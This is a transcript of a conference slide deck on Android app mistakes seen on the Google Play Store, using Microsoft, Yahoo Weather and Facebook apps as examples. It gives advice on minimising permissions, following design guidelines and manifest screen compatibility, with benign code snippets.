PlayStore bashing: learn from the biggest fails on the Google Play Store
-
Upload
eyal-lezmy -
Category
Technology
-
view
218 -
download
0
description
Transcript of PlayStore bashing: learn from the biggest fails on the Google Play Store
![Page 1: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/1.jpg)
PLAY STORE BASHINGLEARN FROM THE BIGGEST FAILS
![Page 2: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/2.jpg)
Eyal LEZMY
http://eyal.fr
SLIDES http://bit.ly/andbigfails
![Page 3: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/3.jpg)
IT ALL STARTS ON THE PLAY STORE
01
![Page 4: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/4.jpg)
![Page 5: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/5.jpg)
![Page 6: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/6.jpg)
Request only what your app requires
1/3 of apps request more permissions than they need
MINIMISE PERMISSIONS
Users should prefer apps
requesting the least
permissions
![Page 7: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/7.jpg)
You don’t need permission
Use ContentProviders
MINIMISE PERMISSIONS
Users should prefer apps
requesting the least
permissions
![Page 8: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/8.jpg)
Permission are not required to launch another activity that has the permission
MINIMISE PERMISSIONS
![Page 9: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/9.jpg)
Need a contact?
MINIMISE PERMISSIONS
![Page 10: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/10.jpg)
Use the force, Luke
MINIMISE PERMISSIONS
![Page 11: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/11.jpg)
MINIMISE PERMISSIONS
Intent intent = new Intent(Intent.ACTION_GET_CONTENT);intent.setType(Phone.CONTENT_ITEM_TYPE);startActivityForResult(intent, MY_REQUEST_CODE);
Start the contact app
void onActivityResult(int requestCode, int resultCode, Intent data) { if (data != null) { Uri uri = data.getData(); if (uri != null) { Cursor c = getContentResolver().query(uri, new String[] {Contacts.DISPLAY_NAME, Phone.NUMBER}, null, null, null);} }
}}
![Page 12: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/12.jpg)
MINIMISE PERMISSIONS
Intent intent = new Intent(Intent.ACTION_GET_CONTENT);intent.setType(Phone.CONTENT_ITEM_TYPE);startActivityForResult(intent, MY_REQUEST_CODE);
Start the contact app
Handle the result
void onActivityResult(int requestCode, int resultCode, Intent data) { if (data != null) { Uri uri = data.getData(); if (uri != null) { Cursor c = getContentResolver().query(uri, new String[] {Contacts.DISPLAY_NAME, Phone.NUMBER}, null, null, null);} }
}}
![Page 13: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/13.jpg)
Need an UUID?
MINIMISE PERMISSIONS
![Page 14: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/14.jpg)
Need an UUID? TelephonyManager.getDeviceId()
Requires READ_PHONE_STATE permission
MINIMISE PERMISSIONS
![Page 15: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/15.jpg)
Need an UUID? TelephonyManager.getDeviceId()
Requires READ_PHONE_STATE permission
MINIMISE PERMISSIONS
Settings.Secure.ANDROID_IDReset at every wipeNot applicable on multi user environment
![Page 16: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/16.jpg)
Need an UUID? TelephonyManager.getDeviceId()
Requires READ_PHONE_STATE permission
MINIMISE PERMISSIONS
NO!
Settings.Secure.ANDROID_IDReset at every wipeNot applicable on multi user environment
![Page 17: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/17.jpg)
Need an UUID? Generate your own UUID and use
Backup API !
MINIMISE PERMISSIONS
String id = UUID.randomUUID().toString();
![Page 18: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/18.jpg)
Need an UUID? Generate your own UUID and use
Backup API !
MINIMISE PERMISSIONS
String id = UUID.randomUUID().toString();
YES!
![Page 19: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/19.jpg)
Android Backup API
· API is available on all Android devices. · Manufacturors can implements their own transport and storage for the API
· Each device as its own backup data
· A new device will take a backup from a device associated with your google account.
· IT'S NOT A SYNC API !
MINIMISE PERMISSIONS
![Page 20: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/20.jpg)
MICROSOFT STORY EPISODE 102
![Page 21: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/21.jpg)
? ? ?
![Page 22: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/22.jpg)
LOOK AND FEEL
HOTMAIL OUTLOOK.COM
![Page 23: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/23.jpg)
LOOK AND FEEL
HOTMAIL OUTLOOK.COM
SAME!
![Page 24: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/24.jpg)
LOOK AND FEEL
FOLLOW THE GUIDELINES!http://d.android.com/design
![Page 25: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/25.jpg)
Redesigned by Taylor Ling
LOOK AND FEEL
![Page 26: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/26.jpg)
By Microsoft
LOOK AND FEEL
![Page 27: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/27.jpg)
LOOK AND FEEL
![Page 28: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/28.jpg)
LOOK AND FEEL
![Page 29: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/29.jpg)
LOOK AND FEEL
FOLLOW THE GUIDELINES!http://d.android.com/design
![Page 30: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/30.jpg)
LOOK AND FEEL
FOLLOW THE GUIDELINES!http://d.android.com/design
PLEASE!
![Page 31: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/31.jpg)
MICROSOFT STORY EPISODE 203
![Page 32: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/32.jpg)
![Page 33: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/33.jpg)
XBOX MUSIC
![Page 34: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/34.jpg)
Emulator(last devices configuration)
XBOX MUSIC
![Page 35: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/35.jpg)
Emulator(last devices configuration)
Nexus 7
S4Nexus 10
Mega
XBOX MUSIC
![Page 36: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/36.jpg)
Emulator(last devices configuration)
Nexus 7
S4Nexus 10
Mega
XCover (Android 2.3)
XBOX MUSIC
![Page 37: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/37.jpg)
Emulator(last devices configuration)
Nexus 7
S4Nexus 10
Mega
XCover (Android 2.3)
Tablets
XBOX MUSIC
![Page 38: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/38.jpg)
Emulator(last devices configuration)
Nexus 7
S4Nexus 10
Note 2
Galaxy Nexus
S3Mega
Note 1XCover (Android 2.3)
Tablets
XBOX MUSIC
![Page 39: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/39.jpg)
Our Nutshell
XBOX MUSIC
Brand New devicesS4, Mega, HTC One, Xperia Z, ...
TabletsNexus 7/10, Tab2, Tab3, Note 10.1, …
Old devicesXCover
Not compatible
![Page 40: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/40.jpg)
Our Nutshell
XBOX MUSIC
Main stream devicesS3, Galaxy Nexus, Note2, Note1, ...
Compatible
![Page 41: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/41.jpg)
The dark side of the force,
Luke
XBOX MUSIC
![Page 42: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/42.jpg)
Let’s look into the
Manifest
XBOX MUSIC
![Page 43: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/43.jpg)
<uses-sdk android:minSdkVersion="14"
android:targetSdkVersion="14" />
XBOX MUSIC
![Page 44: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/44.jpg)
<uses-sdk android:minSdkVersion="14"
android:targetSdkVersion="14" />
Exclude the old devices
XBOX MUSIC
![Page 45: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/45.jpg)
<uses-sdk android:minSdkVersion="14"
android:targetSdkVersion="14" />
Exclude the old devices
XBOX MUSIC
Not recommended (sept. 2013)
![Page 46: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/46.jpg)
<compatible-screens>
<screen android:screenSize="small" android:screenDensity="ldpi" />
<screen android:screenSize="small" android:screenDensity="mdpi" />
<screen android:screenSize="small" android:screenDensity="hdpi" />
<screen android:screenSize="small" android:screenDensity="xhdpi" />
<screen android:screenSize="normal" android:screenDensity="ldpi" />
<screen android:screenSize="normal" android:screenDensity="mdpi" />
<screen android:screenSize="normal" android:screenDensity="hdpi" />
<screen android:screenSize="normal" android:screenDensity="xhdpi" />
</compatible-screens>
XBOX MUSIC
![Page 47: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/47.jpg)
Exclude tablets
<compatible-screens>
<screen android:screenSize="small" android:screenDensity="ldpi" />
<screen android:screenSize="small" android:screenDensity="mdpi" />
<screen android:screenSize="small" android:screenDensity="hdpi" />
<screen android:screenSize="small" android:screenDensity="xhdpi" />
<screen android:screenSize="normal" android:screenDensity="ldpi" />
<screen android:screenSize="normal" android:screenDensity="mdpi" />
<screen android:screenSize="normal" android:screenDensity="hdpi" />
<screen android:screenSize="normal" android:screenDensity="xhdpi" />
</compatible-screens>
XBOX MUSIC
![Page 48: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/48.jpg)
Exclude tablets
<compatible-screens>
<screen android:screenSize="small" android:screenDensity="ldpi" />
<screen android:screenSize="small" android:screenDensity="mdpi" />
<screen android:screenSize="small" android:screenDensity="hdpi" />
<screen android:screenSize="small" android:screenDensity="xhdpi" />
<screen android:screenSize="normal" android:screenDensity="ldpi" />
<screen android:screenSize="normal" android:screenDensity="mdpi" />
<screen android:screenSize="normal" android:screenDensity="hdpi" />
<screen android:screenSize="normal" android:screenDensity="xhdpi" />
</compatible-screens>
XBOX MUSIC
Exclude brand new devices(XXHDPI screens)
![Page 49: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/49.jpg)
Exclude tablets
<compatible-screens>
<screen android:screenSize="small" android:screenDensity="ldpi" />
<screen android:screenSize="small" android:screenDensity="mdpi" />
<screen android:screenSize="small" android:screenDensity="hdpi" />
<screen android:screenSize="small" android:screenDensity="xhdpi" />
<screen android:screenSize="normal" android:screenDensity="ldpi" />
<screen android:screenSize="normal" android:screenDensity="mdpi" />
<screen android:screenSize="normal" android:screenDensity="hdpi" />
<screen android:screenSize="normal" android:screenDensity="xhdpi" />
</compatible-screens>
XBOX MUSIC
Exclude brand new devices(XXHDPI screens)
Too restrictive!
![Page 50: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/50.jpg)
XBOX MUSIC
“You should not use this element”It can dramatically reduce the potential user base for your application
“Use it only as a last resort”When the application absolutely does not work with specific screen configurations
“Instead, follow the guide to Supporting Multiple Screens”
compatible-screens<>
![Page 51: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/51.jpg)
XBOX MUSIC
It does not accept xxhdpi But you can instead specify 480 as the valuecompatible-screens
<>
![Page 52: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/52.jpg)
XBOX MUSIC
Nothing seems tricky...
![Page 53: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/53.jpg)
XBOX MUSIC
XXHDPI
XXHDPI7.7% of Android devices
![Page 54: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/54.jpg)
XBOX MUSIC
XXHDPI
Tablets11.2% of Android devices
![Page 55: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/55.jpg)
XBOX MUSIC
XXHDPI
Missing targets18,9% of the market
![Page 56: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/56.jpg)
The Mistakes
XBOX MUSIC
Have they tested on new devices?
Ignoring the power usersBrand new devices are bought by power users and early adopters
Does not support preloading musicThe app is not prefectly opimized for mobility. Why ignoring nomad devices like tablets?
![Page 57: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/57.jpg)
Return of the APK
XBOX MUSIC
![Page 58: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/58.jpg)
A day after
XBOX MUSIC
![Page 59: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/59.jpg)
A day after
XBOX MUSIC
They updated the app
![Page 60: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/60.jpg)
<supports-screens
android:smallScreens="true"
android:normalScreens="true"
android:largeScreens="false"
android:xlargeScreens="false" />
XBOX MUSIC
<uses-sdk android:minSdkVersion="14"
android:targetSdkVersion="18" />
![Page 61: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/61.jpg)
<supports-screens
android:smallScreens="true"
android:normalScreens="true"
android:largeScreens="false"
android:xlargeScreens="false" />
XBOX MUSIC
<uses-sdk android:minSdkVersion="14"
android:targetSdkVersion="18" />
HURRAY!!
![Page 62: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/62.jpg)
MICROSOFT STORY EPISODE 304
![Page 63: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/63.jpg)
![Page 64: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/64.jpg)
MICROSOFT OFFICE
Follows the guidelines… This time
![Page 65: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/65.jpg)
MICROSOFT OFFICE
Not that bad
But it could be better
![Page 66: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/66.jpg)
Fight the confusion
MICROSOFT OFFICE
Office 365 offer is quite confusingPeople used to buy Office licenses, not to subscribe to an Office service
They try to avoid confusion
![Page 67: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/67.jpg)
MICROSOFT OFFICE
![Page 68: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/68.jpg)
MICROSOFT OFFICE
The title is clear
![Page 69: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/69.jpg)
MICROSOFT OFFICE
Is it enough explicit?
![Page 70: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/70.jpg)
Problem
MICROSOFT OFFICE
Does not support tablet formatA producting app has to be compatible with big screens formats
![Page 71: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/71.jpg)
Problem
MICROSOFT OFFICE
Does not support tablet formatA producting app has to be compatible with big screens formats
- The app is optimized for a phone - On tablet, you can use the Office Webapps- We plan to enable editing with Webapps
Microsoft’s answer on PlayStore
![Page 72: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/72.jpg)
Other problems
MICROSOFT OFFICE
Less features than the competitorsDoes not support local filesDoes not support edition
The backend seems not very readyI have been stuck during 24 hours at the mobile activation, and I’m not alone
![Page 73: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/73.jpg)
Conclusion
MICROSOFT OFFICE
Adapt your UI to screen sizes depending on your features
Differenciate your service from competitorsEspecially when you are new on the market
Your backend have to support your mobile distribution
![Page 74: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/74.jpg)
One more thing!
MICROSOFT OFFICE
![Page 75: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/75.jpg)
Check out the
Manifest
MICROSOFT OFFICE
![Page 76: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/76.jpg)
MICROSOFT OFFICE
<uses-permission android:name="android.permission.READ_LOGS"/>
<uses-sdk android:minSdkVersion="14"
android:targetSdkVersion="16" />
![Page 77: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/77.jpg)
MICROSOFT OFFICE
<uses-permission android:name="android.permission.READ_LOGS"/>
<uses-sdk android:minSdkVersion="14"
android:targetSdkVersion="16" />
They support ICS+
![Page 78: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/78.jpg)
MICROSOFT OFFICE
<uses-permission android:name="android.permission.READ_LOGS"/>
<uses-sdk android:minSdkVersion="14"
android:targetSdkVersion="16" />
They support ICS+
Read sensitive log data
![Page 79: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/79.jpg)
MICROSOFT OFFICE
XXHDPI
Ignore READ_LOGSJelly Bean removed this feature
Accepts READ_LOGS38% of the supported devices
![Page 80: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/80.jpg)
Don’t do this
Why scaring 100% of your users?To use a feature with 38% of them
Avoid using deprecated functionsAs much as possible
MICROSOFT OFFICE
![Page 81: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/81.jpg)
YAHOO! WEATHER05
![Page 82: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/82.jpg)
![Page 83: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/83.jpg)
YAHOO WEATHER
Beautiful...
![Page 84: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/84.jpg)
YAHOO WEATHER
Very good score
![Page 85: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/85.jpg)
Is it perfect?
Hell no!
YAHOO WEATHER
![Page 86: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/86.jpg)
« Try not.Do.
Or do not.There is no try. »
YAHOO WEATHER
![Page 87: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/87.jpg)
« Try not.Do.
Or do not.There is no try. »
YAHOO WEATHER
YODA
![Page 88: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/88.jpg)
YAHOO WEATHER
A splashscreen
![Page 89: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/89.jpg)
YAHOO WEATHER
Non native UI
![Page 90: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/90.jpg)
YAHOO WEATHER
Non native UI
![Page 91: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/91.jpg)
YAHOO WEATHER
Where is my status bar?
![Page 92: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/92.jpg)
YAHOO WEATHER
Immersive experienceGames, Books, Videos
Hide status bar
MultitaskingEverything else
Showstatus bar
![Page 93: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/93.jpg)
When do you check
the weather?
Morning?- Choosing your clothes- Eating your breakfast- Checking your emails- Looking after your kids
YAHOO WEATHER
![Page 94: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/94.jpg)
When do you check
the weather?
Morning?- Choosing your clothes- Eating your breakfast- Checking your emails- Looking after your kids
This is multitasking!
YAHOO WEATHER
![Page 95: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/95.jpg)
YAHOO WEATHER
YoutubeAn immersive app
No status bar
![Page 96: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/96.jpg)
YAHOO WEATHER
It allows multitaskingInside the app
Playing video
![Page 97: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/97.jpg)
YAHOO WEATHER
Samsung Video Player
![Page 98: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/98.jpg)
YAHOO WEATHER
Popup play
Samsung Video Player
![Page 99: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/99.jpg)
About the context you
have to think
YAHOO WEATHER
![Page 100: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/100.jpg)
FACEBOOK EPISODE 106
![Page 101: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/101.jpg)
![Page 102: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/102.jpg)
Under the hood
March 2013
Too much methodsLinearAlloc buffer overflow
Solution is to divide the code into several dex filesAnd load it on demand
![Page 103: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/103.jpg)
Under the hood
March 2013
Facebook app source code was not enough modular to allow this at application level“Too many of our classes are accessed directly by the Android framework”
They had to do it at system level, thanks to reflection“We needed to inject our secondary dex files directly into the system class loader”
![Page 104: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/104.jpg)
« More backwards compatibility for Facebook.
Another day, another private field accessed. »
